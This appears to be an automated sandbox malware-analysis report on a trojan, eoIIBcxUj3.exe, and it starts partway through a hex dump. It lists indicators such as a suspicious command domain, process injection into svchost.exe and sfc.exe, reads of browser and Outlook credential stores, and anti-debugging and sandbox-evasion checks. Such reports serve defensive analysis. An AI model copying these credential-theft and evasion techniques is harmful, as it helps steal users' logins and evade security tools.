30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 30 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c Data Ascii: 22b<html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.20.1</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><
            Source: UJarIfYl5U.exe, 0000000B.00000002.3671463232.00000000057FE000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.l33900.xyz
            Source: UJarIfYl5U.exe, 0000000B.00000002.3671463232.00000000057FE000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.l33900.xyz/gwiz/
            Source: sfc.exe, 0000000A.00000003.1736877391.0000000008278000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org?q=
            Source: sfc.exe, 0000000A.00000003.1736877391.0000000008278000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
            Source: sfc.exe, 0000000A.00000003.1736877391.0000000008278000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
            Source: sfc.exe, 0000000A.00000003.1736877391.0000000008278000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
            Source: sfc.exe, 0000000A.00000003.1736877391.0000000008278000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
            Source: sfc.exe, 0000000A.00000003.1736877391.0000000008278000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtabv20
            Source: sfc.exe, 0000000A.00000003.1736877391.0000000008278000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
            Source: sfc.exe, 0000000A.00000003.1736877391.0000000008278000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gemini.google.com/app?q=
            Source: sfc.exe, 0000000A.00000002.3668125531.00000000033F6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
            Source: sfc.exe, 0000000A.00000002.3668125531.00000000033F6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
            Source: sfc.exe, 0000000A.00000002.3668125531.00000000033F6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
            Source: sfc.exe, 0000000A.00000003.1729877999.0000000008243000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
            Source: sfc.exe, 0000000A.00000003.1736877391.0000000008278000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/v20
            Source: sfc.exe, 0000000A.00000003.1736877391.0000000008278000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_alldp.ico
            Source: sfc.exe, 0000000A.00000002.3670715755.0000000005358000.00000004.10000000.00040000.00000000.sdmp, UJarIfYl5U.exe, 0000000B.00000002.3670020187.00000000046E8000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://wx.longwaysun.com/app/register.php?site_id=2
            Source: sfc.exe, 0000000A.00000002.3670715755.0000000005358000.00000004.10000000.00040000.00000000.sdmp, UJarIfYl5U.exe, 0000000B.00000002.3670020187.00000000046E8000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://wx.longwaysun.com/app/register.php?site_id=2239&topId=96442/gwiz/

            E-Banking Fraud

            barindex
            Source: Yara matchFile source: 0000000A.00000002.3667412952.00000000030C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.1552599848.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.1554111237.0000000005940000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000A.00000002.3667950546.0000000003360000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000A.00000002.3669634420.00000000035D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000002.3669745224.00000000029C0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.1553603148.0000000003AE0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

            System Summary

            barindex
            Source: eoIIBcxUj3.exe, 00000001.00000002.1230807591.00000000005B5000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_c8567a18-f
            Source: eoIIBcxUj3.exe, 00000001.00000002.1230807591.00000000005B5000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_ef4607ed-2
            Source: eoIIBcxUj3.exeString found in binary or memory: This is a third-party compiled AutoIt script.memstr_e521e08b-7
            Source: eoIIBcxUj3.exeString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_aa5e896b-6
            Source: eoIIBcxUj3.exe, 00000001.00000003.1229533682.000000000443D000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs eoIIBcxUj3.exe
            Source: eoIIBcxUj3.exe, 00000001.00000003.1228717172.0000000004293000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs eoIIBcxUj3.exe
            Source: eoIIBcxUj3.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
            Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@7/5@24/6
            Source: C:\Users\user\Desktop\eoIIBcxUj3.exeFile created: C:\Users\user\AppData\Local\Temp\aut1D06.tmpJump to behavior
            Source: eoIIBcxUj3.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Program Files\Mozilla Firefox\firefox.exeFile read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
            Source: C:\Users\user\Desktop\eoIIBcxUj3.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: sfc.exe, 0000000A.00000003.1730860969.0000000003459000.00000004.00000020.00020000.00000000.sdmp, sfc.exe, 0000000A.00000002.3668125531.0000000003459000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
            Source: eoIIBcxUj3.exeVirustotal: Detection: 75%
            Source: eoIIBcxUj3.exeReversingLabs: Detection: 78%
            Source: unknownProcess created: C:\Users\user\Desktop\eoIIBcxUj3.exe "C:\Users\user\Desktop\eoIIBcxUj3.exe"
            Source: C:\Users\user\Desktop\eoIIBcxUj3.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\eoIIBcxUj3.exe"
            Source: C:\Program Files (x86)\zMIFOiZAXONWnNJgulhCfwBstsQuREJGUYKVfWAqEMRolsEXcSOggVgKaDvzZPlj\UJarIfYl5U.exeProcess created: C:\Windows\SysWOW64\sfc.exe "C:\Windows\SysWOW64\sfc.exe"
            Source: C:\Windows\SysWOW64\sfc.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
            Source: C:\Users\user\Desktop\eoIIBcxUj3.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\eoIIBcxUj3.exe"Jump to behavior
            Source: C:\Program Files (x86)\zMIFOiZAXONWnNJgulhCfwBstsQuREJGUYKVfWAqEMRolsEXcSOggVgKaDvzZPlj\UJarIfYl5U.exeProcess created: C:\Windows\SysWOW64\sfc.exe "C:\Windows\SysWOW64\sfc.exe"Jump to behavior
            Source: C:\Windows\SysWOW64\sfc.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
            Source: C:\Users\user\Desktop\eoIIBcxUj3.exeSection loaded: wsock32.dllJump to behavior
            Source: C:\Users\user\Desktop\eoIIBcxUj3.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\eoIIBcxUj3.exeSection loaded: winmm.dllJump to behavior
            Source: C:\Users\user\Desktop\eoIIBcxUj3.exeSection loaded: mpr.dllJump to behavior
            Source: C:\Users\user\Desktop\eoIIBcxUj3.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Users\user\Desktop\eoIIBcxUj3.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\eoIIBcxUj3.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\Desktop\eoIIBcxUj3.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\eoIIBcxUj3.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\eoIIBcxUj3.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\eoIIBcxUj3.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\eoIIBcxUj3.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Windows\SysWOW64\sfc.exeSection loaded: powrprof.dllJump to behavior
            Source: C:\Windows\SysWOW64\sfc.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\SysWOW64\sfc.exeSection loaded: umpdc.dllJump to behavior
            Source: C:\Windows\SysWOW64\sfc.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Windows\SysWOW64\sfc.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\sfc.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\SysWOW64\sfc.exeSection loaded: ieframe.dllJump to behavior
            Source: C:\Windows\SysWOW64\sfc.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\SysWOW64\sfc.exeSection loaded: netapi32.dllJump to behavior
            Source: C:\Windows\SysWOW64\sfc.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\SysWOW64\sfc.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Windows\SysWOW64\sfc.exeSection loaded: wkscli.dllJump to behavior
            Source: C:\Windows\SysWOW64\sfc.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\sfc.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\sfc.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\SysWOW64\sfc.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\SysWOW64\sfc.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\sfc.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\SysWOW64\sfc.exeSection loaded: mlang.dllJump to behavior
            Source: C:\Windows\SysWOW64\sfc.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\SysWOW64\sfc.exeSection loaded: winsqlite3.dllJump to behavior
            Source: C:\Windows\SysWOW64\sfc.exeSection loaded: vaultcli.dllJump to behavior
            Source: C:\Windows\SysWOW64\sfc.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Windows\SysWOW64\sfc.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\sfc.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Program Files (x86)\zMIFOiZAXONWnNJgulhCfwBstsQuREJGUYKVfWAqEMRolsEXcSOggVgKaDvzZPlj\UJarIfYl5U.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Program Files (x86)\zMIFOiZAXONWnNJgulhCfwBstsQuREJGUYKVfWAqEMRolsEXcSOggVgKaDvzZPlj\UJarIfYl5U.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Program Files (x86)\zMIFOiZAXONWnNJgulhCfwBstsQuREJGUYKVfWAqEMRolsEXcSOggVgKaDvzZPlj\UJarIfYl5U.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Program Files (x86)\zMIFOiZAXONWnNJgulhCfwBstsQuREJGUYKVfWAqEMRolsEXcSOggVgKaDvzZPlj\UJarIfYl5U.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Program Files (x86)\zMIFOiZAXONWnNJgulhCfwBstsQuREJGUYKVfWAqEMRolsEXcSOggVgKaDvzZPlj\UJarIfYl5U.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Program Files (x86)\zMIFOiZAXONWnNJgulhCfwBstsQuREJGUYKVfWAqEMRolsEXcSOggVgKaDvzZPlj\UJarIfYl5U.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Windows\SysWOW64\sfc.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3C374A40-BAE4-11CF-BF7D-00AA006946EE}\InProcServer32Jump to behavior
            Source: C:\Windows\SysWOW64\sfc.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
            Source: eoIIBcxUj3.exeStatic file information: File size 1182208 > 1048576
            Source: eoIIBcxUj3.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
            Source: eoIIBcxUj3.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
            Source: eoIIBcxUj3.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
            Source: eoIIBcxUj3.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: eoIIBcxUj3.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
            Source: eoIIBcxUj3.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
            Source: eoIIBcxUj3.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: Binary string: wntdll.pdbUGP source: eoIIBcxUj3.exe, 00000001.00000003.1226558134.00000000042C0000.00000004.00001000.00020000.00000000.sdmp, eoIIBcxUj3.exe, 00000001.00000003.1229310134.0000000004170000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1453580986.0000000003300000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1455611339.0000000003500000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1553124414.000000000389E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1553124414.0000000003700000.00000040.00001000.00020000.00000000.sdmp, sfc.exe, 0000000A.00000002.3669992348.0000000003990000.00000040.00001000.00020000.00000000.sdmp, sfc.exe, 0000000A.00000002.3669992348.0000000003B2E000.00000040.00001000.00020000.00000000.sdmp, sfc.exe, 0000000A.00000003.1555403894.00000000037E5000.00000004.00000020.00020000.00000000.sdmp, sfc.exe, 0000000A.00000003.1552885370.0000000003634000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: eoIIBcxUj3.exe, 00000001.00000003.1226558134.00000000042C0000.00000004.00001000.00020000.00000000.sdmp, eoIIBcxUj3.exe, 00000001.00000003.1229310134.0000000004170000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1453580986.0000000003300000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1455611339.0000000003500000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1553124414.000000000389E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1553124414.0000000003700000.00000040.00001000.00020000.00000000.sdmp, sfc.exe, 0000000A.00000002.3669992348.0000000003990000.00000040.00001000.00020000.00000000.sdmp, sfc.exe, 0000000A.00000002.3669992348.0000000003B2E000.00000040.00001000.00020000.00000000.sdmp, sfc.exe, 0000000A.00000003.1555403894.00000000037E5000.00000004.00000020.00020000.00000000.sdmp, sfc.exe, 0000000A.00000003.1552885370.0000000003634000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: sfc.pdb source: svchost.exe, 00000002.00000003.1521276795.000000000301B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1521351912.0000000003024000.00000004.00000020.00020000.00000000.sdmp, UJarIfYl5U.exe, 00000009.00000002.3668785193.0000000000DAE000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: sfc.pdbGCTL source: svchost.exe, 00000002.00000003.1521276795.000000000301B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1521351912.0000000003024000.00000004.00000020.00020000.00000000.sdmp, UJarIfYl5U.exe, 00000009.00000002.3668785193.0000000000DAE000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: C:\Work\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: UJarIfYl5U.exe, 00000009.00000002.3668098223.0000000000C0F000.00000002.00000001.01000000.00000007.sdmp, UJarIfYl5U.exe, 0000000B.00000002.3667414090.0000000000C0F000.00000002.00000001.01000000.00000007.sdmp
            Source: eoIIBcxUj3.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
            Source: eoIIBcxUj3.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
            Source: eoIIBcxUj3.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
            Source: eoIIBcxUj3.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
            Source: eoIIBcxUj3.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
            Source: C:\Users\user\Desktop\eoIIBcxUj3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\eoIIBcxUj3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\sfc.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\sfc.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\sfc.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\sfc.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\sfc.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion

            barindex
            Source: C:\Users\user\Desktop\eoIIBcxUj3.exeAPI/Special instruction interceptor: Address: 1923234
            Source: C:\Windows\SysWOW64\sfc.exeAPI/Special instruction interceptor: Address: 7FFCC372D324
            Source: C:\Windows\SysWOW64\sfc.exeAPI/Special instruction interceptor: Address: 7FFCC372D7E4
            Source: C:\Windows\SysWOW64\sfc.exeAPI/Special instruction interceptor: Address: 7FFCC372D944
            Source: C:\Windows\SysWOW64\sfc.exeAPI/Special instruction interceptor: Address: 7FFCC372D504
            Source: C:\Windows\SysWOW64\sfc.exeAPI/Special instruction interceptor: Address: 7FFCC372D544
            Source: C:\Windows\SysWOW64\sfc.exeAPI/Special instruction interceptor: Address: 7FFCC372D1E4
            Source: C:\Windows\SysWOW64\sfc.exeAPI/Special instruction interceptor: Address: 7FFCC3730154
            Source: C:\Windows\SysWOW64\sfc.exeAPI/Special instruction interceptor: Address: 7FFCC372DA44
            Source: eoIIBcxUj3.exe, 00000001.00000003.1212031657.0000000001950000.00000004.00000020.00020000.00000000.sdmp, eoIIBcxUj3.exe, 00000001.00000003.1212449596.0000000001950000.00000004.00000020.00020000.00000000.sdmp, eoIIBcxUj3.exe, 00000001.00000003.1212513502.0000000001950000.00000004.00000020.00020000.00000000.sdmp, eoIIBcxUj3.exe, 00000001.00000002.1231480807.0000000001950000.00000004.00000020.00020000.00000000.sdmp, eoIIBcxUj3.exe, 00000001.00000003.1218663247.0000000001950000.00000004.00000020.00020000.00000000.sdmp, eoIIBcxUj3.exe, 00000001.00000003.1211525976.00000000018F3000.00000004.00000020.00020000.00000000.sdmp, eoIIBcxUj3.exe, 00000001.00000003.1218138625.0000000001950000.00000004.00000020.00020000.00000000.sdmp, eoIIBcxUj3.exe, 00000001.00000003.1212092961.0000000001950000.00000004.00000020.00020000.00000000.sdmp, eoIIBcxUj3.exe, 00000001.00000003.1212307471.0000000001950000.00000004.00000020.00020000.00000000.sdmp, eoIIBcxUj3.exe, 00000001.00000003.1211599534.0000000001903000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: FIDDLER.EXEAME1
            Source: C:\Windows\SysWOW64\sfc.exeWindow / User API: threadDelayed 9843Jump to behavior
            Source: C:\Windows\SysWOW64\sfc.exe TID: 5156Thread sleep count: 129 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\sfc.exe TID: 5156Thread sleep time: -258000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\sfc.exe TID: 5156Thread sleep count: 9843 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\sfc.exe TID: 5156Thread sleep time: -19686000s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\zMIFOiZAXONWnNJgulhCfwBstsQuREJGUYKVfWAqEMRolsEXcSOggVgKaDvzZPlj\UJarIfYl5U.exe TID: 5752Thread sleep time: -65000s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\zMIFOiZAXONWnNJgulhCfwBstsQuREJGUYKVfWAqEMRolsEXcSOggVgKaDvzZPlj\UJarIfYl5U.exe TID: 5752Thread sleep count: 32 > 30Jump to behavior
            Source: C:\Program Files (x86)\zMIFOiZAXONWnNJgulhCfwBstsQuREJGUYKVfWAqEMRolsEXcSOggVgKaDvzZPlj\UJarIfYl5U.exe TID: 5752Thread sleep time: -32000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\sfc.exeLast function: Thread delayed
            Source: C:\Windows\SysWOW64\sfc.exeLast function: Thread delayed
            Source: sfc.exe, 0000000A.00000002.3668125531.00000000033E6000.00000004.00000020.00020000.00000000.sdmp, UJarIfYl5U.exe, 0000000B.00000002.3668874645.00000000012B9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
            Source: firefox.exe, 0000000C.00000002.1842602858.00000281E8AEC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllWW
            Source: C:\Windows\SysWOW64\svchost.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\SysWOW64\sfc.exeProcess queried: DebugPortJump to behavior

            HIPS / PFW / Operating System Protection Evasion

            barindex
            Source: C:\Program Files (x86)\zMIFOiZAXONWnNJgulhCfwBstsQuREJGUYKVfWAqEMRolsEXcSOggVgKaDvzZPlj\UJarIfYl5U.exeNtCreateFile: Direct from: 0x77752FECJump to behavior
            Source: C:\Program Files (x86)\zMIFOiZAXONWnNJgulhCfwBstsQuREJGUYKVfWAqEMRolsEXcSOggVgKaDvzZPlj\UJarIfYl5U.exeNtOpenFile: Direct from: 0x77752DCCJump to behavior
            Source: C:\Program Files (x86)\zMIFOiZAXONWnNJgulhCfwBstsQuREJGUYKVfWAqEMRolsEXcSOggVgKaDvzZPlj\UJarIfYl5U.exeNtSetInformationThread: Direct from: 0x777463F9Jump to behavior
            Source: C:\Program Files (x86)\zMIFOiZAXONWnNJgulhCfwBstsQuREJGUYKVfWAqEMRolsEXcSOggVgKaDvzZPlj\UJarIfYl5U.exeNtQueryInformationToken: Direct from: 0x77752CACJump to behavior
            Source: C:\Program Files (x86)\zMIFOiZAXONWnNJgulhCfwBstsQuREJGUYKVfWAqEMRolsEXcSOggVgKaDvzZPlj\UJarIfYl5U.exeNtTerminateThread: Direct from: 0x77752FCCJump to behavior
            Source: C:\Program Files (x86)\zMIFOiZAXONWnNJgulhCfwBstsQuREJGUYKVfWAqEMRolsEXcSOggVgKaDvzZPlj\UJarIfYl5U.exeNtProtectVirtualMemory: Direct from: 0x77752F9CJump to behavior
            Source: C:\Program Files (x86)\zMIFOiZAXONWnNJgulhCfwBstsQuREJGUYKVfWAqEMRolsEXcSOggVgKaDvzZPlj\UJarIfYl5U.exeNtSetInformationProcess: Direct from: 0x77752C5CJump to behavior
            Source: C:\Program Files (x86)\zMIFOiZAXONWnNJgulhCfwBstsQuREJGUYKVfWAqEMRolsEXcSOggVgKaDvzZPlj\UJarIfYl5U.exeNtNotifyChangeKey: Direct from: 0x77753C2CJump to behavior
            Source: C:\Program Files (x86)\zMIFOiZAXONWnNJgulhCfwBstsQuREJGUYKVfWAqEMRolsEXcSOggVgKaDvzZPlj\UJarIfYl5U.exeNtOpenKeyEx: Direct from: 0x77752B9CJump to behavior
            Source: C:\Program Files (x86)\zMIFOiZAXONWnNJgulhCfwBstsQuREJGUYKVfWAqEMRolsEXcSOggVgKaDvzZPlj\UJarIfYl5U.exeNtOpenSection: Direct from: 0x77752E0CJump to behavior
            Source: C:\Program Files (x86)\zMIFOiZAXONWnNJgulhCfwBstsQuREJGUYKVfWAqEMRolsEXcSOggVgKaDvzZPlj\UJarIfYl5U.exeNtAllocateVirtualMemory: Direct from: 0x777548ECJump to behavior
            Source: C:\Program Files (x86)\zMIFOiZAXONWnNJgulhCfwBstsQuREJGUYKVfWAqEMRolsEXcSOggVgKaDvzZPlj\UJarIfYl5U.exeNtQueryVolumeInformationFile: Direct from: 0x77752F2CJump to behavior
            Source: C:\Program Files (x86)\zMIFOiZAXONWnNJgulhCfwBstsQuREJGUYKVfWAqEMRolsEXcSOggVgKaDvzZPlj\UJarIfYl5U.exeNtQuerySystemInformation: Direct from: 0x777548CCJump to behavior
            Source: C:\Program Files (x86)\zMIFOiZAXONWnNJgulhCfwBstsQuREJGUYKVfWAqEMRolsEXcSOggVgKaDvzZPlj\UJarIfYl5U.exeNtAllocateVirtualMemory: Direct from: 0x77752BECJump to behavior
            Source: C:\Program Files (x86)\zMIFOiZAXONWnNJgulhCfwBstsQuREJGUYKVfWAqEMRolsEXcSOggVgKaDvzZPlj\UJarIfYl5U.exeNtDeviceIoControlFile: Direct from: 0x77752AECJump to behavior
            Source: C:\Program Files (x86)\zMIFOiZAXONWnNJgulhCfwBstsQuREJGUYKVfWAqEMRolsEXcSOggVgKaDvzZPlj\UJarIfYl5U.exeNtCreateUserProcess: Direct from: 0x7775371CJump to behavior
            Source: C:\Program Files (x86)\zMIFOiZAXONWnNJgulhCfwBstsQuREJGUYKVfWAqEMRolsEXcSOggVgKaDvzZPlj\UJarIfYl5U.exeNtWriteVirtualMemory: Direct from: 0x7775490CJump to behavior
            Source: C:\Program Files (x86)\zMIFOiZAXONWnNJgulhCfwBstsQuREJGUYKVfWAqEMRolsEXcSOggVgKaDvzZPlj\UJarIfYl5U.exeNtQueryInformationProcess: Direct from: 0x77752C26Jump to behavior
            Source: C:\Program Files (x86)\zMIFOiZAXONWnNJgulhCfwBstsQuREJGUYKVfWAqEMRolsEXcSOggVgKaDvzZPlj\UJarIfYl5U.exeNtResumeThread: Direct from: 0x77752FBCJump to behavior
